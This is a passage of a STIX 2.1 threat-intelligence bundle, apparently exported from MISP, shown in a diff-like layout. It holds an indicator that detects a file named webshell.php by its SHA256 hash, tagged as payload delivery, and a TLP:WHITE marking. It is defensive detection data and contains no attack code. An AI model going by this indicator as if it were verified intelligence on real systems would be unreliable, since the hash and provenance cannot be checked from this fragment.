|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--586b527b-fb50-4977-9f99-4584950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2017-01-03T07:27:55.000Z",
|
|
|
|
"modified": "2017-01-03T07:27:55.000Z",
|
|
|
|
"pattern": "[file:name = 'webshell.php' AND file:hashes.SHA256 = '3367623638d42bdc1c45c44cb1843c00b510814170bc4e5da61eba2ddb212672']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2017-01-03T07:27:55Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"filename|sha256\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "marking-definition",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9",
|
|
|
|
"created": "2017-01-20T00:00:00.000Z",
|
|
|
|
"definition_type": "tlp",
|
|
|
|
"name": "TLP:WHITE",
|
|
|
|
"definition": {
|
|
|
|
"tlp": "white"
|
|
|
|
}
|
|
|
|
}
|
2023-04-21 13:25:09 +00:00
|
|
|
]
|
|
|
|
}
|